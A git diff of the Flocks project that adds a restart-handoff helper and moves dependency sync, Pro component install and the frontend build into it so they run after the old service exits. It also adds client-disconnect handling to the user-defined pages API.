+from flocks.cli import service_manager
+from flocks.utils.log import append_upgrade_text_log
+
+DEFAULT_PARENT_TIMEOUT_SECONDS = 20.0
+DEFAULT_PORT_TIMEOUT_SECONDS = 10.0
+POST_STOP_PORT_TIMEOUT_SECONDS = 20.0
+DEFAULT_POLL_INTERVAL_SECONDS = 0.25
+
+
+class _NullConsole:
+    def print(self, *args, **kwargs) -> None:
+        return None
+
+
+def _record_handoff_log(message: str) -> None:
+    append_upgrade_text_log(f"restart_handoff {message}")
+
+
+def _wait_for_parent_exit(
+    parent_pid: int,
+    *,
+    timeout_seconds: float = DEFAULT_PARENT_TIMEOUT_SECONDS,
+    poll_interval_seconds: float = DEFAULT_POLL_INTERVAL_SECONDS,
+) -> bool:
+    deadline = time.monotonic() + timeout_seconds
+    while time.monotonic() < deadline:
+        if not service_manager.pid_is_running(parent_pid):
+            return True
+        time.sleep(poll_interval_seconds)
+    return not service_manager.pid_is_running(parent_pid)
+
+
+def _backend_port_in_use(port: int) -> bool:
+    listeners = service_manager.port_owner_pids(port)
+    return service_manager.port_is_in_use(port, listeners)
+
+
+def _wait_for_backend_port_free(
+    port: int,
+    *,
+    timeout_seconds: float = DEFAULT_PORT_TIMEOUT_SECONDS,
+    poll_interval_seconds: float = DEFAULT_POLL_INTERVAL_SECONDS,
+) -> bool:
+    deadline = time.monotonic() + timeout_seconds
+    while time.monotonic() < deadline:
+        if not _backend_port_in_use(port):
+            return True
+        time.sleep(poll_interval_seconds)
+    return not _backend_port_in_use(port)
+
+
+def _ensure_backend_port_free(backend_port: int, backend_pid_file: Path) -> bool:
+    if _wait_for_backend_port_free(backend_port):
+        return True
+
+    _record_handoff_log(f"backend_port_still_in_use port={backend_port}; stopping backend")
+    try:
+        service_manager.stop_one(backend_port, backend_pid_file, "backend", _NullConsole())
+    except Exception as exc:
+        _record_handoff_log(f"backend_stop_failed port={backend_port} error={exc}")
+        return False
+
+    return _wait_for_backend_port_free(backend_port, timeout_seconds=POST_STOP_PORT_TIMEOUT_SECONDS)
+
+
+def _cli_subcommand(argv: Sequence[str]) -> str | None:
+    for index, value in enumerate(argv[:-2]):
+        if value == "-m" and argv[index + 1] == "flocks.cli.main":
+            return argv[index + 2]
+    return None
+
+
+def _record_backend_runtime_if_direct_serve(
+    process: subprocess.Popen,
+    restart_argv: Sequence[str],
+    *,
+    backend_host: str,
+    backend_port: int,
+    backend_pid_file: Path,
+) -> None:
+    if _cli_subcommand(restart_argv) != "serve":
+        return
+
+    try:
+        service_manager.write_runtime_record(
+            backend_pid_file,
+            service_manager.process_runtime_record(
+                process,
+                host=backend_host,
+                port=backend_port,
+                command=restart_argv,
+            ),
+        )
+    except Exception as exc:
+        _record_handoff_log(f"backend_runtime_record_failed error={exc}")
+
+
+def _parse_args(argv: Sequence[str] | None = None) -> argparse.Namespace:
+    parser = argparse.ArgumentParser(description="Flocks restart handoff helper")
+    parser.add_argument("--parent-pid", type=int, required=True)
+    parser.add_argument("--backend-host", required=True)
+    parser.add_argument("--backend-port", type=int, required=True)
+    parser.add_argument("--frontend-host", required=True)
+    parser.add_argument("--frontend-port", type=int, required=True)
+    parser.add_argument("--backend-pid-file", required=True)
+    parser.add_argument("--install-root", required=True)
+    parser.add_argument("--uv-path", required=True)
+    parser.add_argument("--sync-timeout", type=int, required=True)
+    parser.add_argument("--version", required=True)
+    parser.add_argument("--current-version", required=True)
+    parser.add_argument("--backup-path")
+    parser.add_argument("--uv-default-index")
+    parser.add_argument("--npm-registry")
+    parser.add_argument("--pro-wheel-path")
+    parser.add_argument("--pro-bundle-manifest-path")
+    parser.add_argument("--bundle-sha256")
+    parser.add_argument("--cleanup-dir")
+    parser.add_argument("restart_argv", nargs=argparse.REMAINDER)
+    args = parser.parse_args(argv)
+    if args.restart_argv and args.restart_argv[0] == "--":
+        args.restart_argv = args.restart_argv[1:]
+    return args
+
+
+def _run_upgrade_tasks(args: argparse.Namespace) -> str | None:
+    from flocks.updater import updater
+
+    return asyncio.run(
+        updater.run_handoff_upgrade_tasks(
+            install_root=Path(args.install_root),
+            uv_path=args.uv_path,
+            version=args.version,
+            uv_default_index=args.uv_default_index,
+            npm_registry=args.npm_registry,
+            pro_wheel_path=Path(args.pro_wheel_path) if args.pro_wheel_path else None,
+            pro_bundle_manifest_path=(
+                Path(args.pro_bundle_manifest_path) if args.pro_bundle_manifest_path else None
+            ),
+            bundle_sha256=args.bundle_sha256,
+            sync_timeout=args.sync_timeout,
+        )
+    )
+
+
+def _rollback_failed_upgrade(args: argparse.Namespace, error: str) -> None:
+    from flocks.updater import updater
+
+    _record_handoff_log(f"upgrade_tasks_failed error={error}")
+    backup_path = Path(args.backup_path) if args.backup_path else None
+    try:
+        updater._rollback_failed_update(
+            backup_path,
+            Path(args.install_root),
+            args.current_version,
+        )
+    except Exception as exc:
+        _record_handoff_log(f"rollback_failed error={exc}")
+
+
+def _cleanup_dir(path_value: str | None) -> None:
+    if not path_value:
+        return
+    shutil.rmtree(Path(path_value), ignore_errors=True)
+
+
+def run(argv: Sequence[str] | None = None) -> int:
+    args = _parse_args(argv)
+    restart_argv = list(args.restart_argv)
+    if not restart_argv:
+        _record_handoff_log("missing_restart_argv")
+        return 2
+
+    _record_handoff_log(
+        "started "
+        f"parent_pid={args.parent_pid} backend={args.backend_host}:{args.backend_port} "
+        f"frontend={args.frontend_host}:{args.frontend_port}"
+    )
+
+    if not _wait_for_parent_exit(args.parent_pid):
+        _record_handoff_log(f"parent_exit_timeout parent_pid={args.parent_pid}")
+        _cleanup_dir(args.cleanup_dir)
+        return 1
+
+    backend_pid_file = Path(args.backend_pid_file)
+    if not _ensure_backend_port_free(args.backend_port, backend_pid_file):
+        _record_handoff_log(f"backend_port_unavailable port={args.backend_port}")
+        _cleanup_dir(args.cleanup_dir)
+        return 1
+
+    try:
+        task_error = _run_upgrade_tasks(args)
+    except Exception as exc:
+        task_error = f"upgrade tasks crashed: {exc}"
+    if task_error is not None:
+        _rollback_failed_upgrade(args, task_error)
+        _cleanup_dir(args.cleanup_dir)
+        return 1
+
+    try:
+        process = subprocess.Popen(
+            restart_argv,
+            cwd=Path(args.install_root),
+            close_fds=True,
+        )
+    except OSError as exc:
+        _record_handoff_log(f"restart_spawn_failed error={exc}")
+        _cleanup_dir(args.cleanup_dir)
+        return 1
+
+    _record_backend_runtime_if_direct_serve(
+        process,
+        restart_argv,
+        backend_host=args.backend_host,
+        backend_port=args.backend_port,
+        backend_pid_file=backend_pid_file,
+    )
+    _record_handoff_log(f"restart_spawned pid={process.pid}")
+    _cleanup_dir(args.cleanup_dir)
+    return 0
+
+
+def main() -> None:
+    raise SystemExit(run())
+
+
+if __name__ == "__main__":
+    main()
diff --git a/flocks/updater/updater.py b/flocks/updater/updater.py
index 2196dc974..51d9dcda9 100644
--- a/flocks/updater/updater.py
+++ b/flocks/updater/updater.py
@@ -13,6 +13,7 @@
 """
 
 import asyncio
+import contextlib
 import importlib.util
 import json
 import os
@@ -55,6 +56,7 @@
 _FRONTEND_BUILD_TIMEOUT_SECONDS = 300
 _DEPENDENCY_SYNC_TIMEOUT_SECONDS = 180
 _WINDOWS_DEPENDENCY_SYNC_TIMEOUT_SECONDS = 300
+_CANCELLATION_RETRY_DELAY_SECONDS = 0.1
 
 _PRESERVE_NAMES: set[str] = {
     ".venv",
@@ -294,63 +296,21 @@ def _get_repo_root() -> Path:
     return Path(__file__).parent.parent.parent
 
 
-def _windows_upgrade_python_path(install_root: Path) -> Path:
-    """Return the Windows project virtualenv interpreter for upgrade restarts."""
-    return install_root / ".venv" / "Scripts" / "python.exe"
+def _upgrade_python_path(install_root: Path) -> Path:
+    """Return the project virtualenv interpreter used for upgrade restarts."""
+    if sys.platform == "win32":
+        return install_root / ".venv" / "Scripts" / "python.exe"
+    return install_root / ".venv" / "bin" / "python"
 
 
-async def _validate_windows_restart_runtime(
+async def _validate_restart_runtime(
     install_root: Path,
-    *,
-    max_attempts: int = 2,
-    timeout: int = 60,
-    retry_delay: float = 3.0,
 ) -> str | None:
-    """Validate the Windows project runtime that will be used for restart.
-
-    Retries up to *max_attempts* times to tolerate transient delays caused by
-    antivirus scanning or filesystem cache warm-up after ``uv sync``.
-    """
-    python_exe = _windows_upgrade_python_path(install_root)
+    """Validate that the project runtime path exists for restart."""
+    python_exe = _upgrade_python_path(install_root)
     if not python_exe.exists():
-        return f"Windows restart runtime is missing: {python_exe}"
-
-    last_error: str = ""
-    for attempt in range(max_attempts):
-        try:
-            code, _, err = await _run_async(
-                [str(python_exe), "-c", "import flocks; import uvicorn"],
-                cwd=install_root,
-                timeout=timeout,
-            )
-        except subprocess.TimeoutExpired:
-            last_error = (
-                f"Validation timed out ({timeout}s) — "
-                "antivirus or filesystem cache may still be warming up."
-            )
-            log.warning(
-                "updater.validate_runtime.timeout",
-                {"attempt": attempt + 1, "timeout": timeout},
-            )
-        except Exception as exc:
-            last_error = str(exc)
-            log.warning(
-                "updater.validate_runtime.error",
-                {"attempt": attempt + 1, "error": last_error},
-            )
-        else:
-            if code == 0:
-                return None
-            last_error = err or "unknown error"
-            log.warning(
-                "updater.validate_runtime.nonzero",
-                {"attempt": attempt + 1, "code": code, "error": last_error},
-            )
-
-        if attempt < max_attempts - 1:
-            await asyncio.sleep(retry_delay)
-
-    return f"Windows restart runtime validation failed: {last_error}"
+        return f"Restart runtime is missing: {python_exe}"
+    return None
 
 
 def _build_uv_sync_env() -> dict[str, str] | None:
@@ -561,6 +521,8 @@ async def _await_ignoring_cancellation(awaitable):
             return await asyncio.shield(task)
         except asyncio.CancelledError:
             log.warning("updater.restart.critical_step_cancelled_ignored")
+            with contextlib.suppress(asyncio.CancelledError):
+                await asyncio.sleep(_CANCELLATION_RETRY_DELAY_SECONDS)
 
 
 def _dependency_sync_timeout_seconds() -> int:
@@ -572,14 +534,95 @@ def _dependency_sync_timeout_seconds() -> int:
 
 def _build_dependency_sync_command(uv_path: str, *, uv_default_index: str | None = None) -> list[str]:
     """Build the ``uv sync`` command used by the self-updater."""
-    cmd = [uv_path, "sync"]
-    if sys.platform == "win32":
-        cmd.append("--no-install-project")
+    cmd = [uv_path, "sync", "--frozen", "--no-python-downloads"]
     if uv_default_index:
         cmd.extend(["--default-index", uv_default_index])
     return cmd
 
 
+async def _sync_project_dependencies(
+    *,
+    uv_path: str,
+    install_root: Path,
+    uv_default_index: str | None = None,
+    sync_timeout: int | None = None,
+    env: dict[str, str] | None = None,
+) -> str | None:
+    """Synchronize backend dependencies in the active project environment."""
+    effective_timeout = sync_timeout or _dependency_sync_timeout_seconds()
+    uv_cmd = _build_dependency_sync_command(uv_path, uv_default_index=uv_default_index)
+    retried_after_managed_python_repair = False
+    log.info("updater.dependencies.sync", {"tool": "uv sync", "path": uv_path})
+
+    async def _run_uv_sync(cmd: list[str]) -> tuple[int, str, str]:
+        return await _run_async(
+            cmd,
+            cwd=install_root,
+            timeout=effective_timeout,
+            env=env,
+        )
+
+    def _timeout_message() -> str:
+        return f"Dependency sync timed out after {effective_timeout}s while running uv sync."
+
+    try:
+        code, _, err = await _run_uv_sync(uv_cmd)
+    except subprocess.TimeoutExpired:
+        return _timeout_message()
+
+    if (
+        code != 0
+        and sys.platform == "win32"
+        and not retried_after_managed_python_repair
+        and _is_uv_managed_python_runtime_error(err)
+    ):
+        retried_after_managed_python_repair = True
+        repaired_dir = await asyncio.to_thread(_repair_windows_uv_managed_python_install, err)
+        if repaired_dir is not None:
+            log.warning(
+                "updater.dependencies.sync_repair_uv_python",
+                {"path": str(repaired_dir)},
+            )
+        else:
+            log.warning(
+                "updater.dependencies.sync_repair_uv_python_missing_path",
+                {"error": err},
+            )
+        await asyncio.sleep(2)
+        try:
+            code, _, err = await _run_uv_sync(uv_cmd)
+        except subprocess.TimeoutExpired:
+            return _timeout_message()
+
+    if code != 0 and uv_default_index:
+        log.warning(
+            "updater.dependencies.sync_retry_default_index",
+            {
+                "first_error": err,
+                "default_index": uv_default_index,
+            },
+        )
+        await asyncio.sleep(3)
+        uv_cmd = _build_dependency_sync_command(uv_path)
+        try:
+            code, _, err = await _run_uv_sync(uv_cmd)
+        except subprocess.TimeoutExpired:
+            return _timeout_message()
+
+    if code != 0:
+        log.warning("updater.dependencies.sync_retry", {"first_error": err})
+        await asyncio.sleep(3)
+        try:
+            code, _, err = await _run_uv_sync(uv_cmd)
+        except subprocess.TimeoutExpired:
+            return _timeout_message()
+
+    if code != 0:
+        return f"Dependency sync failed: {err}"
+
+    return None
+
+
 # ------------------------------------------------------------------ #
 # Async subprocess helpers
 # ------------------------------------------------------------------ #
@@ -1666,6 +1709,70 @@ async def _restore_pro_component_snapshot(
     return None
 
 
+async def run_handoff_upgrade_tasks(
+    *,
+    install_root: Path,
+    uv_path: str,
+    version: str,
+    uv_default_index: str | None = None,
+    npm_registry: str | None = None,
+    pro_wheel_path: Path | None = None,
+    pro_bundle_manifest_path: Path | None = None,
+    bundle_sha256: str | None = None,
+    sync_timeout: int | None = None,
+) -> str | None:
+    """Run upgrade work that must happen after the old service exits."""
+    sync_env = _build_uv_sync_env()
+    sync_error = await _sync_project_dependencies(
+        uv_path=uv_path,
+        install_root=install_root,
+        uv_default_index=uv_default_index,
+        sync_timeout=sync_timeout,
+        env=sync_env,
+    )
+    if sync_error is not None:
+        return sync_error
+
+    if pro_wheel_path is not None:
+        python_path = _venv_python_path(install_root)
+        install_cmd = [uv_path, "pip", "install", "--python", str(python_path), "--no-deps", str(pro_wheel_path)]
+        code, _, err = await _run_async(
+            install_cmd,
+            cwd=install_root,
+            timeout=180,
+            env=sync_env,
+        )
+        if code != 0:
+            return f"Flocks Pro component install failed: {err}"
+
+    validation_error = await _validate_restart_runtime(install_root)
+    if validation_error:
+        return validation_error
+
+    install_webui_dir = install_root / "webui"
+    if install_webui_dir.is_dir() and (install_webui_dir / "package.json").exists():
+        frontend_error = await _build_frontend_workspace(
+            install_webui_dir,
+            npm_registry=npm_registry,
+        )
+        if frontend_error is not None:
+            return frontend_error
+
+    _write_version_marker(version.lstrip("v"))
+    if pro_bundle_manifest_path is not None and pro_bundle_manifest_path.is_file():
+        _write_pro_bundle_install_marker(
+            _load_json_file(pro_bundle_manifest_path),
+            bundle_sha256=bundle_sha256,
+        )
+
+    try:
+        _refresh_global_cli_entry(install_root)
+    except Exception as exc:
+        log.warning("updater.refresh_cli.failed", {"error": str(exc)})
+
+    return None
+
+
 def _write_pro_bundle_install_marker(manifest: dict[str, Any], *, bundle_sha256: str | None = None) -> None:
     marker = _flocks_root() / "run" / "pro-bundle-installed.json"
     marker.parent.mkdir(parents=True, exist_ok=True)
@@ -1700,35 +1807,6 @@ def _current_service_config():
     )
 
 
-def _build_service_restart_argv(install_root: Path | None = None) -> list[str]:
-    repo_root = install_root or _get_repo_root()
-    if sys.platform == "win32":
-        venv_python = repo_root / ".venv" / "Scripts" / "python.exe"
-    else:
-        venv_python = repo_root / ".venv" / "bin" / "python"
-
-    if not venv_python.exists():
-        raise FileNotFoundError(f"Restart runtime is missing: {venv_python}")
-
-    config = _current_service_config()
-    return [
-        str(venv_python),
-        "-m",
-        "flocks.cli.main",
-        "restart",
-        "--no-browser",
-        "--skip-webui-build",
-        "--server-host",
-        str(config.backend_host),
-        "--server-port",
-        str(config.backend_port),
-        "--webui-host",
-        str(config.frontend_host),
-        "--webui-port",
-        str(config.frontend_port),
-    ]
-
-
 def _spawn_detached_process(
     command: list[str],
     *,
@@ -2198,7 +2276,11 @@ def rollback_upgrade_handover() -> None:
 def cleanup_replaced_files(root: Path | None = None) -> None:
     install_root = root or _get_repo_root()
     leftovers = sorted(
-        (path for path in install_root.rglob("*") if ".flocks_old_" in path.name),
+        (
+            path
+            for path in install_root.rglob("*")
+            if ".flocks_old_" in path.name
+        ),
         key=lambda path: len(path.parts),
         reverse=True,
     )
@@ -2655,9 +2737,6 @@ async def perform_update(
     install_root = _get_repo_root()
     current_version = get_current_version()
     handover_active = False
-    pro_bundle_marker_manifest: dict[str, Any] | None = None
-    pro_component_snapshot: _ProComponentSnapshot | None = None
-
     console_manifest_info: ConsoleManifestRelease | None = None
     fmt = _choose_archive_format(ucfg.archive_format)
     if profile.sources == ["console-manifest"]:
@@ -2882,9 +2961,9 @@ async def _restore_after_apply_failure() -> None:
             return
 
     # ------------------------------------------------------------------ #
-    # Step 5 – sync dependencies
+    # Step 5 – prepare dependency sync
     # ------------------------------------------------------------------ #
-    yield UpdateProgress(stage="syncing", message="Syncing dependencies...")
+    yield UpdateProgress(stage="syncing", message="Preparing dependency sync...")
 
     uv_path = _find_executable("uv")
     if not uv_path:
@@ -2901,167 +2980,43 @@ async def _restore_after_apply_failure() -> None:
         yield UpdateProgress(stage="error", message=hint, success=False)
         return
 
-    log.info("updater.dependencies.sync", {"tool": "uv sync", "path": uv_path})
-    uv_cmd = _build_dependency_sync_command(uv_path, uv_default_index=profile.uv_default_index)
-
-    sync_env = _build_uv_sync_env()
     sync_timeout = _dependency_sync_timeout_seconds()
-    retried_after_managed_python_repair = False
-
-    async def _run_uv_sync(cmd: list[str]) -> tuple[int, str, str]:
-        return await _run_async(
-            cmd,
-            cwd=install_root,
-            timeout=sync_timeout,
-            env=sync_env,
+    pro_bundle_manifest_path: Path | None = None
+    if pro_bundle_manifest:
+        pro_bundle_manifest_path = tmp_dir / "pro-bundle-marker.json"
+        pro_bundle_manifest_path.write_text(
+            json.dumps(pro_bundle_manifest, ensure_ascii=True, sort_keys=True),
+            encoding="utf-8",
         )
 
-    def _dependency_sync_timeout_message() -> str:
-        return f"Dependency sync timed out after {sync_timeout}s while running uv sync."
-
-    try:
-        code, _, err = await _run_uv_sync(uv_cmd)
-    except subprocess.TimeoutExpired:
-        shutil.rmtree(tmp_dir, ignore_errors=True)
-        await _restore_after_apply_failure()
-        timeout_message = _dependency_sync_timeout_message()
-        _record_update_journal(f"ERROR {timeout_message}")
-        yield UpdateProgress(stage="error", message=timeout_message, success=False)
-        return
-    if (
-        code != 0
-        and sys.platform == "win32"
-        and not retried_after_managed_python_repair
-        and _is_uv_managed_python_runtime_error(err)
-    ):
-        retried_after_managed_python_repair = True
-        repaired_dir = await asyncio.to_thread(_repair_windows_uv_managed_python_install, err)
-        if repaired_dir is not None:
-            log.warning(
-                "updater.dependencies.sync_repair_uv_python",
-                {"path": str(repaired_dir)},
-            )
-        else:
-            log.warning(
-                "updater.dependencies.sync_repair_uv_python_missing_path",
-                {"error": err},
-            )
-        await asyncio.sleep(2)
-        try:
-            code, _, err = await _run_uv_sync(uv_cmd)
-        except subprocess.TimeoutExpired:
-            shutil.rmtree(tmp_dir, ignore_errors=True)
-            await _restore_after_apply_failure()
-            timeout_message = _dependency_sync_timeout_message()
-            _record_update_journal(f"ERROR {timeout_message}")
-            yield UpdateProgress(stage="error", message=timeout_message, success=False)
-            return
-    if code != 0 and profile.uv_default_index:
-        log.warning(
-            "updater.dependencies.sync_retry_default_index",
-            {
-                "first_error": err,
-                "default_index": profile.uv_default_index,
-            },
+    # ------------------------------------------------------------------ #
+    # Step 6 – run post-apply tasks or restart via handoff
+    #
+    # With restart=True, dependency sync, Pro install, frontend build, marker
+    # writes, and CLI refresh happen in restart_handoff after the old backend
+    # exits. This avoids mutating the active Python environment while the old
+    # service is still running.
+    # ------------------------------------------------------------------ #
+    if not restart:
+        task_error = await run_handoff_upgrade_tasks(
+            install_root=install_root,
+            uv_path=uv_path,
+            version=latest_tag,
+            uv_default_index=profile.uv_default_index,
+            npm_registry=profile.npm_registry,
+            pro_wheel_path=pro_wheel_path,
+            pro_bundle_manifest_path=pro_bundle_manifest_path,
+            bundle_sha256=bundle_sha256,
+            sync_timeout=sync_timeout,
         )
-        await asyncio.sleep(3)
-        uv_cmd = _build_dependency_sync_command(uv_path)
-        try:
-            code, _, err = await _run_uv_sync(uv_cmd)
-        except subprocess.TimeoutExpired:
-            shutil.rmtree(tmp_dir, ignore_errors=True)
-            await _restore_after_apply_failure()
-            timeout_message = _dependency_sync_timeout_message()
-            _record_update_journal(f"ERROR {timeout_message}")
-            yield UpdateProgress(stage="error", message=timeout_message, success=False)
-            return
-    if code != 0:
-        log.warning("updater.dependencies.sync_retry", {"first_error": err})
-        await asyncio.sleep(3)
-        try:
-            code, _, err = await _run_uv_sync(uv_cmd)
-        except subprocess.TimeoutExpired:
+        if task_error is not None:
             shutil.rmtree(tmp_dir, ignore_errors=True)
             await _restore_after_apply_failure()
-            timeout_message = _dependency_sync_timeout_message()
-            _record_update_journal(f"ERROR {timeout_message}")
-            yield UpdateProgress(stage="error", message=timeout_message, success=False)
+            _record_update_journal(f"ERROR {task_error}")
+            yield UpdateProgress(stage="error", message=task_error, success=False)
             return
 
-    if code != 0:
         shutil.rmtree(tmp_dir, ignore_errors=True)
-        await _restore_after_apply_failure()
-        yield UpdateProgress(stage="error", message=f"Dependency sync failed: {err}", success=False)
-        return
-
-    if pro_wheel_path is not None:
-        yield UpdateProgress(
-            stage="syncing",
-            message="Installing Flocks Pro component...",
-            pro_component_filename=pro_wheel_path.name,
-        )
-        python_path = _venv_python_path(install_root)
-        install_cmd = [uv_path, "pip", "install", "--python", str(python_path), "--no-deps", str(pro_wheel_path)]
-        pro_component_snapshot = await _snapshot_pro_component(install_root)
-        code, _, err = await _run_async(
-            install_cmd,
-            cwd=install_root,
-            timeout=180,
-            env=sync_env,
-        )
-        if code != 0:
-            shutil.rmtree(tmp_dir, ignore_errors=True)
-            await _restore_after_apply_failure()
-            restore_error = await _restore_pro_component_snapshot(
-                pro_component_snapshot,
-                uv_path=uv_path,
-                install_root=install_root,
-                env=sync_env,
-            )
-            message = f"Flocks Pro component install failed: {err}"
-            if restore_error:
-                message = f"{message}\n{restore_error}"
-            yield UpdateProgress(stage="error", message=message, success=False)
-            return
-        if pro_bundle_manifest:
-            pro_bundle_marker_manifest = pro_bundle_manifest
-
-    if sys.platform == "win32":
-        validation_error = await _validate_windows_restart_runtime(install_root)
-        if validation_error:
-            shutil.rmtree(tmp_dir, ignore_errors=True)
-            await _restore_after_apply_failure()
-            if pro_component_snapshot is not None:
-                await _restore_pro_component_snapshot(
-                    pro_component_snapshot,
-                    uv_path=uv_path,
-                    install_root=install_root,
-                    env=sync_env,
-                )
-            yield UpdateProgress(stage="error", message=validation_error, success=False)
-            return
-
-    shutil.rmtree(tmp_dir, ignore_errors=True)
-    _write_version_marker(latest_tag.lstrip("v"))
-    if pro_bundle_marker_manifest:
-        _write_pro_bundle_install_marker(pro_bundle_marker_manifest, bundle_sha256=bundle_sha256)
-
-    try:
-        _refresh_global_cli_entry(install_root)
-    except Exception as exc:
-        log.warning("updater.refresh_cli.failed", {"error": str(exc)})
-
-    # ------------------------------------------------------------------ #
-    # Step 6 – restart in-place (skipped when restart=False, e.g. CLI)
-    # Send the "restarting" event while the proxy is still alive, then
-    # perform the handover, rebuild the frontend in the active install tree,
-    # and finally restart the service.
-    #
-    # CRITICAL: once handover starts we ignore client-disconnect cancellation
-    # until the build/restart sequence finishes, so the temporary upgrade page
-    # is not left behind half-way through cutover.
-    # ------------------------------------------------------------------ #
-    if not restart:
         log.info("updater.apply.done", {"version": latest_tag, "restart": False, "region": profile.region})
         yield UpdateProgress(
             stage="done",
@@ -3118,63 +3073,38 @@ def _dependency_sync_timeout_message() -> str:
             )
             return
 
-    install_webui_dir = install_root / "webui"
-    if install_webui_dir.is_dir() and (install_webui_dir / "package.json").exists():
-        if not handover_active:
-            frontend_error = "Refusing to rebuild frontend before WebUI handover completes."
-            _record_update_journal(f"ERROR {frontend_error}")
-            await _restore_after_apply_failure()
-            yield UpdateProgress(
-                stage="error",
-                message=frontend_error,
-                success=False,
-            )
-            return
-        frontend_error = await _await_ignoring_cancellation(
-            _build_frontend_workspace(
-                install_webui_dir,
-                npm_registry=profile.npm_registry,
-            )
-        )
-        if frontend_error is not None:
-            _record_update_journal(f"ERROR {frontend_error}")
-            await _await_ignoring_cancellation(_restore_after_apply_failure())
-            yield UpdateProgress(
-                stage="error",
-                message=frontend_error,
-                success=False,
-            )
-            return
-
-    if sys.platform == "win32":
-        log.info("updater.restart.spawn", {"argv": restart_argv})
-        try:
-            subprocess.Popen(
-                restart_argv,
-                cwd=install_root,
-                close_fds=True,
-            )
-            os._exit(0)
-        except OSError as exc:
-            log.error("updater.restart.spawn_failed", {"error": str(exc)})
-            if handover_active:
-                try:
-                    rollback_upgrade_handover()
-                except Exception:
-                    pass
-                handover_active = False
-            yield UpdateProgress(
-                stage="error",
-                message=f"Failed to restart service: {exc}",
-                success=False,
-            )
-            return
-
-    log.info("updater.restart.execv", {"argv": restart_argv})
     try:
-        os.execv(restart_argv[0], restart_argv)
-    except OSError as exc:
-        log.error("updater.restart.execv_failed", {"error": str(exc)})
+        handoff_argv = _build_restart_handoff_argv(
+            restart_argv,
+            install_root,
+            uv_path=uv_path,
+            sync_timeout=sync_timeout,
+            version=latest_tag,
+            current_version=current_version,
+            backup_path=backup_path,
+            uv_default_index=profile.uv_default_index,
+            npm_registry=profile.npm_registry,
+            pro_wheel_path=pro_wheel_path,
+            pro_bundle_manifest_path=pro_bundle_manifest_path,
+            bundle_sha256=bundle_sha256,
+            cleanup_dir=tmp_dir,
+        )
+        log.info(
+            "updater.restart.handoff_spawn",
+            {
+                "argv": handoff_argv,
+                "restart_argv": restart_argv,
+            },
+        )
+        subprocess.Popen(
+            handoff_argv,
+            cwd=install_root,
+            close_fds=True,
+        )
+        os._exit(0)
+    except Exception as exc:
+        log.error("updater.restart.handoff_spawn_failed", {"error": str(exc)})
+        shutil.rmtree(tmp_dir, ignore_errors=True)
         if handover_active:
             try:
                 rollback_upgrade_handover()
@@ -3252,7 +3182,7 @@ def _refresh_global_cli_entry(install_root: Path) -> None:
 
 
 def _build_restart_argv(install_root: Path | None = None) -> list[str]:
-    """Reconstruct the argv for ``os.execv`` so the process restarts correctly.
+    """Reconstruct the argv used by restart handoff to restart correctly.
 
     Always uses the project ``.venv`` Python to ensure the restarted process
     runs in the same environment that ``uv sync`` just updated.
@@ -3286,6 +3216,75 @@ def _build_restart_argv(install_root: Path | None = None) -> list[str]:
     return [str(venv_python), "-m", "flocks.cli.main"] + clean_rest
 
 
+def _build_restart_handoff_argv(
+    restart_argv: list[str],
+    install_root: Path,
+    *,
+    uv_path: str,
+    sync_timeout: int,
+    version: str,
+    current_version: str,
+    backup_path: Path | None = None,
+    uv_default_index: str | None = None,
+    npm_registry: str | None = None,
+    pro_wheel_path: Path | None = None,
+    pro_bundle_manifest_path: Path | None = None,
+    bundle_sha256: str | None = None,
+    cleanup_dir: Path | None = None,
+) -> list[str]:
+    """Wrap the real restart command in a helper that finishes upgrade work."""
+    from flocks.cli import service_manager
+
+    if not restart_argv:
+        raise ValueError("restart command is empty")
+
+    config = _current_service_config()
+    paths = service_manager.ensure_runtime_dirs()
+    argv = [
+        restart_argv[0],
+        "-m",
+        "flocks.updater.restart_handoff",
+        "--parent-pid",
+        str(os.getpid()),
+        "--backend-host",
+        str(config.backend_host),
+        "--backend-port",
+        str(config.backend_port),
+        "--frontend-host",
+        str(config.frontend_host),
+        "--frontend-port",
+        str(config.frontend_port),
+        "--backend-pid-file",
+        str(paths.backend_pid),
+        "--install-root",
+        str(install_root),
+        "--uv-path",
+        uv_path,
+        "--sync-timeout",
+        str(sync_timeout),
+        "--version",
+        version,
+        "--current-version",
+        current_version,
+    ]
+    if backup_path is not None:
+        argv.extend(["--backup-path", str(backup_path)])
+    if uv_default_index:
+        argv.extend(["--uv-default-index", uv_default_index])
+    if npm_registry:
+        argv.extend(["--npm-registry", npm_registry])
+    if pro_wheel_path is not None:
+        argv.extend(["--pro-wheel-path", str(pro_wheel_path)])
+    if pro_bundle_manifest_path is not None:
+        argv.extend(["--pro-bundle-manifest-path", str(pro_bundle_manifest_path)])
+    if bundle_sha256:
+        argv.extend(["--bundle-sha256", bundle_sha256])
+    if cleanup_dir is not None:
+        argv.extend(["--cleanup-dir", str(cleanup_dir)])
+    argv.extend(["--", *restart_argv])
+    return argv
+
+
 def _resolve_windows_restart_command(argv0: str, orig_argv: list[str]) -> list[str] | None:
     """Recover the Windows launcher plus script or ``-m`` invocation from ``orig_argv``."""
     if not orig_argv:
diff --git a/flocks/user_defined_pages/api_runtime.py b/flocks/user_defined_pages/api_runtime.py
index e009a1359..0b04b60cd 100644
--- a/flocks/user_defined_pages/api_runtime.py
+++ b/flocks/user_defined_pages/api_runtime.py
@@ -18,6 +18,7 @@
 import yaml
 from fastapi import HTTPException, Request, status
 from fastapi.responses import JSONResponse, Response
+from starlette.requests import ClientDisconnect
 
 from flocks.user_defined_pages.models import UserDefinedPageApiMeta
 from flocks.user_defined_pages.store import UserDefinedPagesStore
@@ -30,6 +31,7 @@
 _MAX_TIMEOUT_MS = 30000
 _MAX_RESPONSE_BYTES = 2_000_000
 _MAX_REQUEST_BODY_BYTES = 1_000_000
+_CLIENT_CLOSED_REQUEST_STATUS = 499
 _STDLIB_DIR = Path(sysconfig.get_paths()["stdlib"]).resolve()
 
 
@@ -98,7 +100,14 @@ async def dispatch(self, page_id: str, api_path: str, request: Request, user: An
         page_id = self._store.validate_page_id(page_id)
         if not self._store.page_dir(page_id).is_dir():
             raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f"page not found: {page_id}")
-        await self._guard_request_size(request)
+        try:
+            await self._guard_request_size(request)
+        except ClientDisconnect:
+            log.info(
+                "user_defined_pages.api.client_disconnected",
+                {"pageId": page_id, "method": request.method, "path": request.url.path},
+            )
+            return Response(status_code=_CLIENT_CLOSED_REQUEST_STATUS)
 
         runtime = await self._load_page_runtime(page_id, force_reload=False)
         normalized_path = "/" + api_path.strip("/")
diff --git a/flocks/workflow/center.py b/flocks/workflow/center.py
